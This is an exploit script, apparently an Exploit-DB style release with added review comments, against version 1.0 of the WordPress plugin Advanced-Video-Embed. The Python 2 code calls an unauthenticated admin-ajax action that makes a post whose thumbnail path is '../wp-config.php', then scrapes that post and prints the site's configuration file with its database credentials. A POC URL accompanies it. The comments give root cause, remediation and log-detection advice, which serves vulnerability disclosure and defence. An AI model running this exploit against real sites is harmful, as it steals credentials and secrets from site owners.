#!/usr/bin/env python
# Exploit Title: Advanced-Video-Embed Arbitrary File Download / Unauthenticated Post Creation
# Google Dork: N/A
# Date: 04/01/2016
# Exploit Author: evait security GmbH
# Vendor Homepage: arshmultani - http://dscom.it/
# Software Link: https://wordpress.org/plugins/advanced-video-embed-embed-videos-or-playlists/
# Version: 1.0
# Tested on: Linux Apache / WordPress 4.2.2

# Timeline
# 03/24/2016 - Bug discovered
# 03/24/2016 - Initial notification of vendor
# 04/01/2016 - No answer from vendor, public release of bug

# Vulnerable Code (/inc/classes/class.avePost.php) Line 57:
#function ave_publishPost(){
#$title = $_REQUEST['title'];
#$term = $_REQUEST['term'];
#$thumb = $_REQUEST['thumb'];
# <snip>
# Line 78:
#$image_data = file_get_contents($thumb);

# POC - http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=[FILEPATH]

# Exploit - Print the content of wp-config.php in terminal (default WordPress config)

# NOTE(review): root cause, as shown in the quoted PHP above, is twofold:
#   1. the admin-ajax action `ave_publishPost` is reachable without any
#      authentication or capability check, so anyone can create posts;
#   2. the request-controlled `thumb` value goes straight into
#      `file_get_contents()`, so a local path is read and stored as the
#      post's "thumbnail", which is then served back publicly.
# Remediation for the plugin: gate the handler with a capability check and
# nonce (`current_user_can()` / `check_ajax_referer()`), and only accept
# `thumb` as a validated http(s) URL fetched via `wp_safe_remote_get()`
# rather than `file_get_contents()` on an arbitrary path. Sites running the
# affected version should disable the plugin until a fixed release exists.
# Detection: web-server/WAF logs for requests to `/wp-admin/admin-ajax.php`
# with `action=ave_publishPost`, in particular a `thumb=` parameter that
# contains `../` or a non-URL path, plus posts/attachments appearing
# without a logged-in author.
#
# This script is Python 2 only (urllib2, `long`, the `L` literal suffix and
# the `print` statement).

import random
import urllib2
import re

url = "http://127.0.0.1/wordpress" # insert url to wordpress

# Random title so the post created by this request can be told apart from
# legitimate content (Python 2 `long`; the `L` suffix does not exist in Python 3).
randomID = long(random.random() * 100000000000000000L)

# Step 1: trigger the unauthenticated action. `thumb` is a relative path that
# the server resolves and reads with file_get_contents() (see "Line 78" above);
# the response is expected to contain the id of the newly created post.
objHtml = urllib2.urlopen(url + '/wp-admin/admin-ajax.php?action=ave_publishPost&title=' + str(randomID) + '&short=rnd&term=rnd&thumb=../wp-config.php')
content =objHtml.readlines()
for line in content:
    # Take the last run of digits on each line; after the loop `id` holds the
    # value from the last line. A line with no digits raises IndexError here.
    numbers = re.findall(r'\d+',line)
    id = numbers[-1]
    # NOTE(review): presumably the response appends one extra trailing digit
    # to the post id, hence the integer division by 10 — not verifiable here.
    # Python 2 `/` on ints is floor division; `id` also shadows the builtin.
    id = int(id) / 10

# Step 2: fetch the public post page, locate the featured-image URL that the
# plugin attached (which is the stored file contents), and print its body.
objHtml = urllib2.urlopen(url + '/?p=' + str(id))
content = objHtml.readlines()
for line in content:
    if 'attachment-post-thumbnail size-post-thumbnail wp-post-image' in line:
        # First double-quoted http(s) URL on the matching line is assumed to be
        # the thumbnail `src`; nothing checks that one was actually found.
        urls=re.findall('"(https?://.*?)"', line)
        print urllib2.urlopen(urls[0]).read()